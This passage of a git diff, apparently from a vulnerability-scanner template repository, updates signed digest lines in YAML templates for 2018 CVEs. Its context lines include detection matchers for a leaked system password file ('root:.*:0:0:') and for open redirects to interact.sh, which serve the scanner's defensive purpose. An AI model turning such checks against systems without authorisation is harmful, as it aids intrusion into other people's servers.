4b0a00483046022100947b6346d02bd8a4ad42f71809bda79a1bf035b1abe6121d4b7b811a515c2a8a02210091c5e79557aee9afc16fa31f56b83b05dd7cde686d08279b945f30757286d792:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-10956.yaml b/http/cves/2018/CVE-2018-10956.yaml index 50fa3a3e3f..b1590df786 100644 --- a/http/cves/2018/CVE-2018-10956.yaml +++ b/http/cves/2018/CVE-2018-10956.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d9d5fbbae10553167d9c415cb92a7db1bfc91846fe52114f108dff19dc0c0bc0022052ab683639adb114492fa4627a69ea313a36af905641a6805e29a7ff1563e57f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210087203919d95848d70e3a8840ad2184d7ccc5b6228e610f8bc999cf0a83b711fc02200a14f02d3fe451ccacb24e60a4e82c175b023b66a62eaadd6a90479fb75b3e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11227.yaml b/http/cves/2018/CVE-2018-11227.yaml index 96cdd9c109..3189e7892e 100644 --- a/http/cves/2018/CVE-2018-11227.yaml +++ b/http/cves/2018/CVE-2018-11227.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100853f9c6cfb12519c82a81347f3874fd3d2952e11fe632f0d503a7354cea22c21022061ccde204264de75fcef0b0c3c2a15d78a3d77008479064f2347391838144f87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100daefbc1c86b5ff7aa088fde9180ed046d7f37e53409c300a8e5fb343ce2806d4022005c695baced97dd824869c81e8e4350292de5bc08d55723eeedc17f9c7b02aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11231.yaml b/http/cves/2018/CVE-2018-11231.yaml index d1d2cea4e9..166a2b8764 100644 --- a/http/cves/2018/CVE-2018-11231.yaml +++ b/http/cves/2018/CVE-2018-11231.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220672fc02832aaf8d667e4a0858125dc6dea65e34b9b488b610c561ef47efa147f022100d675f5c2b812729f574e501dddc8e85db1a855c093583424954a41e193beecec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009001f6527480e6c9901d859c1911c9d6b8c8c21a1f3af4da6657e54eca2f0cac0220021a805d482df67be8a8cdfb2053469616ea91b218d2cc5dc0dc9edb1c39fa6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11409.yaml b/http/cves/2018/CVE-2018-11409.yaml index 6ebc76edfa..41ebc67046 100644 --- a/http/cves/2018/CVE-2018-11409.yaml +++ b/http/cves/2018/CVE-2018-11409.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008e9fb72789459ca8d438abf1a5e5848290577c6b5972411a769c05450658ae07022100c08b4dafb07b0d2a4b8ff5f164d97c91f5d93b982177b9e3a1931dca26dafbd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a1adbe427ea8dff904f68f65253943e34981b772a6d431c240d604cc056bb47022100cc24f9475ac8d7f66fde9e397f9a8e30166c16f182ac002511e723317c849a6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11473.yaml b/http/cves/2018/CVE-2018-11473.yaml index 3cbc959913..7cf03fd391 100644 --- a/http/cves/2018/CVE-2018-11473.yaml +++ b/http/cves/2018/CVE-2018-11473.yaml @@ -69,4 +69,4 @@ http: - 'id="csrf" name="csrf" value="(.*)">' internal: true part: body -# digest: 4a0a00473045022023418b0bd7c765e159c81014598a5f5dad1a34b3183959586c9a8f775938900e022100ddb473087dac58cd50f8472054cd2caba81c7ab4fbbbad4493b07b6bd7ae6012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e97e0a68d893194c8d566eda14fd940e6fbad93b7d3ea3cdf6e9d7a3a6ba21102207615efbf96e1af2a70766467de6a5f3a32e852c30dab3d9542d14cb5d4bb95c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11709.yaml b/http/cves/2018/CVE-2018-11709.yaml index db9bdf5071..a6ae8b2da0 100644 --- a/http/cves/2018/CVE-2018-11709.yaml +++ b/http/cves/2018/CVE-2018-11709.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204c4f46cce9a1097999590e680c289a0c7e821fc0ccf2802777d3f355f69631ab022100e2fae5013b327f7fa3d04cc696b27c0194f2f9c03e38e58fb99f6b34e6704498:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204d898012f485464435365e32c82daabe7baef5831f365891cae8a2333d83d866022100fe7b181c84352fb1dabc4c0341621e560696d90056bdeec25c9e741e44a535df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11759.yaml b/http/cves/2018/CVE-2018-11759.yaml index d107655a4d..bb95daf5c3 100644 --- a/http/cves/2018/CVE-2018-11759.yaml +++ b/http/cves/2018/CVE-2018-11759.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203cac2fe2d0ab4b4036d3e444a16be43374645739fa2015c61e060ec92dbf052802201f4d9caab87009b9e0dcdf31bd4bda4b25205bd3f9a42818781d5c8aef371a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220654d294ecb26e146a1c2036ff7f17522387d9224d1e2a779cf54424bc43db18a02207328ca35658ded53036544739cac916d636a2d6bfd8a86477c3b70c1c17da476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11776.yaml b/http/cves/2018/CVE-2018-11776.yaml index b008252432..bae2ab687c 100644 --- a/http/cves/2018/CVE-2018-11776.yaml +++ b/http/cves/2018/CVE-2018-11776.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f45b973add47b6e3076816297a08941c85f7bb4d9ba71632b7db58f94e2f64c802206c151edf1356d0784f6903749a16ed853e73fa323100e602763a0f372467a8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022030686c68ea7d7f1ed3effd1cf634a6eeb390c80be936305061b5da23d7569e4a022100a93253059a14cfba509c4061fd33f56662aadefdb7fc751a1d27552dd3013177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-11784.yaml b/http/cves/2018/CVE-2018-11784.yaml index 491e60fcb3..c77fa4ae23 100644 --- a/http/cves/2018/CVE-2018-11784.yaml +++ b/http/cves/2018/CVE-2018-11784.yaml @@ -47,4 +47,4 @@ http: negative: true status: - 404 -# digest: 490a0046304402201f4393ed8f2fe20c4fd54f9616971e59357da8ef6ed5f1a16e5b354857de04d402202eaaa8e31d0f9f179bee3e1427e192ea6f0c5acbc67849263611effa8fe9c4cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202dc03f83438e02ee880a7de1afb74479f312090cd9321e4180eb09fd2007850a022100aeea63cf413d2f20896bd452abd6435e7d069feb9edaacf7ccc74abb213fdbf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12031.yaml b/http/cves/2018/CVE-2018-12031.yaml index 13062ac44f..dcab7c316e 100644 --- a/http/cves/2018/CVE-2018-12031.yaml +++ b/http/cves/2018/CVE-2018-12031.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200c568082d57463015a72c0ac3d5597c5799adb4b265412913c026d4f0b1e170f022073cd9359256b3a6d7d44863f0ee1096c922eccd59e7bb32ff2b6919d5201f415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d624fb5e650e164707d5cce3298d1828f7d19829bf64e24125525cc4dea7df0402210086e29eb239af1ca600167ea9cfe28eb3bddd21e3e7cbce073e8b4abf6442e937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12054.yaml b/http/cves/2018/CVE-2018-12054.yaml index 626c40c114..3dbe926b64 100644 --- a/http/cves/2018/CVE-2018-12054.yaml +++ b/http/cves/2018/CVE-2018-12054.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022079925b2c8857f3bb3c1cce640e60688393ebc60e04262285b9d24cbdf74dd759022100db052a9649054c760bac709de0e3da56fad43afbf316e2320e4e15499eb87874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1588370d9e93ee514952eb6462d8f586c20428ef49a8ef6d488f0c3345b6e7d022079d6f44b131a4aeef499f58da924c471e243a7fef7eafaa27fbb5325d5645f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1207.yaml b/http/cves/2018/CVE-2018-1207.yaml index 988c7ed081..e539969e98 100644 --- a/http/cves/2018/CVE-2018-1207.yaml +++ b/http/cves/2018/CVE-2018-1207.yaml @@ -42,4 +42,4 @@ http: part: response words: - "calling init: /lib/" -# digest: 4b0a00483046022100cdc2713773363d8045519f2ee5ad1fc4363f3c539ea66a96ec4d9c62f84b827e0221008229950b33559b0ebc4637536d2243365bd216d52026213fd976ae2463db841e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f746db495c14714583f0d7e41abc078c683798be8c32c7f10f1e077a576c687102206c8915353d8b0c5fc193bf8282e19e2d82aea80f4d83df8df6161b1d3b1733d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12095.yaml b/http/cves/2018/CVE-2018-12095.yaml index f102950945..58cb166039 100644 --- a/http/cves/2018/CVE-2018-12095.yaml +++ b/http/cves/2018/CVE-2018-12095.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022075be208a307205c853110c33fd7341734b6d40f9269ce8189d387ebc40a9baaf02201dea139339978ec040a1c04e8f5e2c7a726b6e8bde414f5b4cdbf6d6a2e88ae5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100928df262680f316f51fa8f7753585f660ffea311bd2417f373701982d01cb98a022100bf1bd3a3c84530c12f93c5c0440d46199762a4545f76344872ac03c813d5021f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12296.yaml b/http/cves/2018/CVE-2018-12296.yaml index 39b96ccd3d..a46cd229ae 100644 --- a/http/cves/2018/CVE-2018-12296.yaml +++ b/http/cves/2018/CVE-2018-12296.yaml @@ -47,4 +47,4 @@ http: regex: - '"version": "([0-9.]+)"' part: body -# digest: 4a0a0047304502210088c34461d85bffb165c308034533866bd7eee6e6163d58b39046c076002f3b9302206e0a4ba175fb723e39796f8311ab738341de9e92387dc4222f386f13919274d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205c4a803384d6072389dfd9e85f0ed3fe4d8f7d7ef8d42e0ff043ddb9ee75172a022100d5fbabaaa05e77e1c3a24115a1e2c53ea702ff7711706e49c66baec4fe2e45b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12300.yaml b/http/cves/2018/CVE-2018-12300.yaml index 4ff49cb38e..7ff955a044 100644 --- a/http/cves/2018/CVE-2018-12300.yaml +++ b/http/cves/2018/CVE-2018-12300.yaml @@ -36,4 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502202c4d01625343e65e244bd0213b48c9a0ba194cab7aaed23d0116310c260a2908022100814be48649c8b8b57de19a3812207b9e5a8213058dd0606bb8acb0c4a398137c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a004530430220300b70482e05c6953210b174bfac134b0c9dadb5a702c59a938f981e921e3726021f2d8534b66b76aed6ba05403972107a0637d9dc3055ea6368cfa4abba4f28a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12613.yaml b/http/cves/2018/CVE-2018-12613.yaml index d210380745..ec25fc2681 100644 --- a/http/cves/2018/CVE-2018-12613.yaml +++ b/http/cves/2018/CVE-2018-12613.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e82db79b01411365294e1064bb99286ad38506c0360beace48c376afb76e2a50022044b656574a2e6467ede70477d7e91d8a63ed3f335cd8c133436ca98f4b127d5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206080c5f71f4a4668437ec7481114c485bcd9701b779dc308a1636a89f21bd7230220620ed128491113136881492dfa09b0ac2ae3362385c0ea448878b1ff3d67cc2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12634.yaml b/http/cves/2018/CVE-2018-12634.yaml index 5b1c0c4899..d6edb3744c 100644 --- a/http/cves/2018/CVE-2018-12634.yaml +++ b/http/cves/2018/CVE-2018-12634.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206478c6dbec451155ed0308a4ae148ba881af0c7b1b46ef63551f46dda83c2c710221009a44c42737796faeaf56ea11f0940ddd6217af486def2b5b042f8b589e7f15fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed0b29ad551cb1c8046e44ccfeb468882574d4d84131408c68bd1df5afd26cfa022075bd7e7320c9c33dad093dd40822990e12fc84791e76510619255948ce4ba1cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12675.yaml b/http/cves/2018/CVE-2018-12675.yaml index f2f8a23f94..b6962b3fc6 100644 --- a/http/cves/2018/CVE-2018-12675.yaml +++ b/http/cves/2018/CVE-2018-12675.yaml @@ -40,4 +40,4 @@ http: part: body words: - '' -# digest: 4a0a004730450220259ce09b98d9d5e11104831565de1695869962725c611a4de2aa00a3e2c8d4cb022100ea6707597fa386d381f2ab3e939a3e9516457cfacc86e637fdc11280279cb04d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100939db6b9d6165dd467edc0c97382497aa6ab9556bcaaca9a91ebc154083988fe022100cc9dad1576ca963cc685945349e72bce06f5210926524294ac73915b6a9b696c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1271.yaml b/http/cves/2018/CVE-2018-1271.yaml index de1b80c5cf..56fb431233 100644 --- a/http/cves/2018/CVE-2018-1271.yaml +++ b/http/cves/2018/CVE-2018-1271.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210088b3514173bab2d2d9e78e2e2ade11c914ff4e81ba7666a3fbef88e8436ff7f902200d766541f08f927ee5b7063eb539eeb9875e767f8b7dcdb10b301e672ff77584:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202116b0240e73d65695dfbb33865db4678c8948c6cfa28cc54e56546c7938577e0220536e48f757f3a937c821d02c65518bcd90f9551f6f75785e658ed0d2e336f012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1273.yaml b/http/cves/2018/CVE-2018-1273.yaml index 8c331e1adb..21b5cbe06f 100644 --- a/http/cves/2018/CVE-2018-1273.yaml +++ b/http/cves/2018/CVE-2018-1273.yaml @@ -55,4 +55,4 @@ http: - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or -# digest: 490a004630440220699a47b0d24976d01b1760fd164fd5b8c6105c9a3ff09d1f43d560b184b3ea940220287897b643d3538f1ca3824daadc3a5c96be99c456069ed622edbe69c409708b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e3f8695fda2e0ac780943699a80667e2e623cd3e5f6608a9a6d81eae84363560220766bcab2aa9507e36939556c06f457c983abcbb491ecaa730503d9ccd92b6ee5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12909.yaml b/http/cves/2018/CVE-2018-12909.yaml index 308a18a352..64bd845dce 100644 --- a/http/cves/2018/CVE-2018-12909.yaml +++ b/http/cves/2018/CVE-2018-12909.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b71ab550b2cc89e7d0583662a9ded5c5ce6425e9dc17ab69d844b888534f4aec02205951abe575fe888786d471e50833801cc2bebefb4b5fe62d5f194ded86d310e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bbfe94777b475096d530f08664a384c61eb1ec70da84a6a31c5e18194219bf1022100a86d7e7770f8edf1daf070e33aca62ceb23d9bbc720caa83302a0af39b91a3fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-12998.yaml b/http/cves/2018/CVE-2018-12998.yaml index 94b3840027..6de7b10f8f 100644 --- a/http/cves/2018/CVE-2018-12998.yaml +++ b/http/cves/2018/CVE-2018-12998.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220111fe9d6e03a68b2a8a4b78b2f8e92000c7a040ac44b63f00a3ff899b56986bb0221008bca6dba56fafce19541133bdd4b5cd06f8d3543b4b82d3b53b2ceccbb980b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9ffa1635114ff913d0531535c772539330a018d115c77b507ec6bd82deae847022010a4dfd480bf1eeeb1a0bfa4a92c2fe79e64cdc1bf474fea96fe0b828915885c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-1335.yaml b/http/cves/2018/CVE-2018-1335.yaml index b1976ccaf5..c5f634c14c 100644 --- a/http/cves/2018/CVE-2018-1335.yaml +++ b/http/cves/2018/CVE-2018-1335.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207021fa50afc6de338557b57d7aa37b6c87abe24ce1cb02ef5d530ac841cf1097022100efa68638f3441565a793eac0fee29f75d80eff1c0a1cca49d77e36d8a92ec312:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b692a92fe9cdd5485edaad76d36ff495be415b918be43b1e42fe38bdffb8899c022100ac54d169f390193b575d4529970efb4414fca0764d3bc049f08648b0a0217e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13379.yaml b/http/cves/2018/CVE-2018-13379.yaml index a2b1473968..a63c7c2e90 100644 --- a/http/cves/2018/CVE-2018-13379.yaml +++ b/http/cves/2018/CVE-2018-13379.yaml @@ -39,4 +39,4 @@ http: part: body regex: - '^var fgt_lang =' -# digest: 4a0a0047304502200f8a42452e53a5164f36e00127b700fc50aa2a7a570220127eb4723c66d55f25022100d4fa9709de322b21d33c9505402f90f12cf8d484495303c489c922c9c9681549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008e50642d78059a84e8644285bce41c7b12c1566d906884ad429cf5e2cd6c126e02200b8e7b346c6c1a657ea9972800866efb26f6bc657eb3ef9c2f119ad40980644b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13380.yaml b/http/cves/2018/CVE-2018-13380.yaml index 5c17dd4e08..cbda72c841 100644 --- a/http/cves/2018/CVE-2018-13380.yaml +++ b/http/cves/2018/CVE-2018-13380.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ed83af5f3e347370c653d56a1d04ebe556ac9156b46b87e39b4e6df4242489f30221008399c5b5667cf68f66138b59d59ab2c7f22aa428660362b90413fc582a1541c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b4fb94549440bbcda574bcc0604dd3bff1be0f662689873499a55840d035fcc8022100d94be38f0300c9d2ff9a5cdabe5211b3ac7498ca971f2f13dc10defcb9d163e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-13980.yaml b/http/cves/2018/CVE-2018-13980.yaml index 7ffe010851..ab3e132ed7 100644 --- a/http/cves/2018/CVE-2018-13980.yaml +++ b/http/cves/2018/CVE-2018-13980.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fd3411082032af8bbb8b2257d19924985a982a9a8139579fcbba09b06005a8bd02206fcd7e7cf6ea345adecdd73ea79643aff0e5c5dc2e71ef38f9793dd9a3223432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a50a107182439af15a0b3aaf188ad7ed2cbff2483aa8000a31ab0efacd0611d022100c78d838a4dc595eade203eafce49da1ca1f1eb46145ee39190fc6d06c67f542b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14013.yaml b/http/cves/2018/CVE-2018-14013.yaml index 4e81bee449..78d32deb28 100644 --- a/http/cves/2018/CVE-2018-14013.yaml +++ b/http/cves/2018/CVE-2018-14013.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201f68e01812a6a2ac06cfbc727c2fc18af1f6d279cf8accaadb438dd8b388b2a4022100ce88ef90892dd6bc1304bb0e415d6f9b7fa3ffac32f17a6fd31d767a6a33303d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100972e82a7dcc9c8a881c90752ce344bb095bdf8c26e22368ca69e14d603d9c929022017238807f525eeeaa53a3f149cf6f9899787ccc3f489351b7e28f3b19524ef02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14064.yaml b/http/cves/2018/CVE-2018-14064.yaml index 04be098db3..5f50b178a5 100644 --- a/http/cves/2018/CVE-2018-14064.yaml +++ b/http/cves/2018/CVE-2018-14064.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022070a9c1923032ecd24d0bf75f7e81e8cbb8e34382eca31e840e0e19421ef2c4a402202a15683c39fedf1f6181dc89e56ae1f261dad92c18776b2a4c9eb1e8a5518130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059a8f1ee8b2b31c519655af903439ab2bf33cd9979d1f8ad0cdb203e207c5848022078ddbc4af569fcb4f8f6bc781f72acd4ec8770d57bf10201ed5d3be3b7573316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14474.yaml b/http/cves/2018/CVE-2018-14474.yaml index de2030dcf3..8116b51916 100644 --- a/http/cves/2018/CVE-2018-14474.yaml +++ b/http/cves/2018/CVE-2018-14474.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100939a2b23e92686e811d38e50bccc1e8bacff3c62f7cf7d4130426cb89e596cfa022100d864cfe4a0f5417f096a11f107dc90a9738d28055e0666a485155a1de3ffdfbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b60f8cc804199b2b82cca64a27b4b5e334e5a1adf1fbae4ba2889752111860460220061672c450b3f12ed248b63940e789a92692b4f4eded5a8e2a373a81d7946e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14574.yaml b/http/cves/2018/CVE-2018-14574.yaml index cca648cc82..141b3ca471 100644 --- a/http/cves/2018/CVE-2018-14574.yaml +++ b/http/cves/2018/CVE-2018-14574.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 301 -# digest: 4b0a004830460221008eb325406f3b381f24b0138441f39ebbe9f1c4232104f304ff132c5e75e3335302210099c15fb6ce8201c103a69788ee4eb4a1f27e39257ae40078ddea19e80b821e14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202844e45b7d27b955f69858435951a9eee3987edee53a8001875914e60ac14588022007160ab2934a060ab0e5aa315ff5069194515bb25138c885921258aa605cee67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14728.yaml b/http/cves/2018/CVE-2018-14728.yaml index 063f5caf3f..bc894db2c9 100644 --- a/http/cves/2018/CVE-2018-14728.yaml +++ b/http/cves/2018/CVE-2018-14728.yaml @@ -38,4 +38,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a00463044022014ff41efa0fa46b999efc7034d1de4b1d83688c6a8d4625f3fb73937ccc37dcb02205de22757069bbe19e3f8bb95c3157aca4b616feafff7108e867a0a7f467cc410:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c8bb844811c8db7be65f3c293cee97c08dd69d3aaaa25924ab40ff20683222e022100a91bb741e726a611fe9d6c0740e3fd6a10f8dcd153d97d4046cd0ec1fa06e6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14912.yaml b/http/cves/2018/CVE-2018-14912.yaml index 9f7fd9aa7e..4e713fef97 100644 --- a/http/cves/2018/CVE-2018-14912.yaml +++ b/http/cves/2018/CVE-2018-14912.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082c3d215a291de632831208a51b5a39031db9b3dc1971a1c43972170288eaeca022100e1969edd08a2b7185680f225d3d9b2ed5021099a78cf2efa4aff3a60e76d3373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a123cd58a22cf98fe436b298b027f9c5fcc58254ccaa8826abbe2c6960f1622f022100a133ee010d69898c3fabcf0bceea1a3386492c867996ac3ecf091129b9b17b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14916.yaml b/http/cves/2018/CVE-2018-14916.yaml index a9434a4a2c..bbf3ea1e96 100644 --- a/http/cves/2018/CVE-2018-14916.yaml +++ b/http/cves/2018/CVE-2018-14916.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0a4114bdb83e7e6cc14c9982396554803968368529bdd011bc3b5153ac5042b022006d47aab742e1084692b36198078d7fd3480ad0d997e3569a400d7b257b6d5fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022070c2c015a425fb1469de4b0b4b5c427127886af8e6e88dffdc643c6f3359b34202207b1890894dffaf9b944ebbf70fc15a92995f616a7f1bdb5d36717cd6440e01e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14918.yaml b/http/cves/2018/CVE-2018-14918.yaml index 75bc492e73..d785efec47 100644 --- a/http/cves/2018/CVE-2018-14918.yaml +++ b/http/cves/2018/CVE-2018-14918.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ac5bdac032fa1f86830731897a94b28a6839ab4aef6bcf654490af18c7b89b8b022100dc1f6769b4f4e2f0a072fd6cf7c6103a9bc87c4bc69159a95323775ea6a034ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ede7f15cc61df99105a6c03a5315716c1282520668c6d5e9093903ba4ddf78fe02203e751861b022ed4500c9074db48d8ba399adddecb2a1f1b8675025131f68dca0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-14931.yaml b/http/cves/2018/CVE-2018-14931.yaml index 409aeaeb8d..f8c0b69350 100644 --- a/http/cves/2018/CVE-2018-14931.yaml +++ b/http/cves/2018/CVE-2018-14931.yaml @@ -36,4 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a00483046022100952f4e06b256687fdeb9f4452bfd8ca4b2fe74688a71dea5ef6cc6d690d426010221008c394a7c7c8d37003e53d08a217d17132481e414d91bb8fec18321be2366edfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220795b73a65559cb418e4b722bb14ec2d73e7c873e2496bbec9704d37f7eac0f4902204367e41ee0a0145adae48e7a63cb4cda2a52caed8a7cd685c176a9646082e8c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-15138.yaml b/http/cves/2018/CVE-2018-15138.yaml index cec940d899..208d07bdc0 100644 --- a/http/cves/2018/CVE-2018-15138.yaml +++ b/http/cves/2018/CVE-2018-15138.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b7bcf9a6f1c466fb9475a9a3067017085396a60a3ce03b48b78534d22f9cd60a02205882a1cd98063f2fa7d5ce7341ad0760f9b61fd37dca55237bc6699084135c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 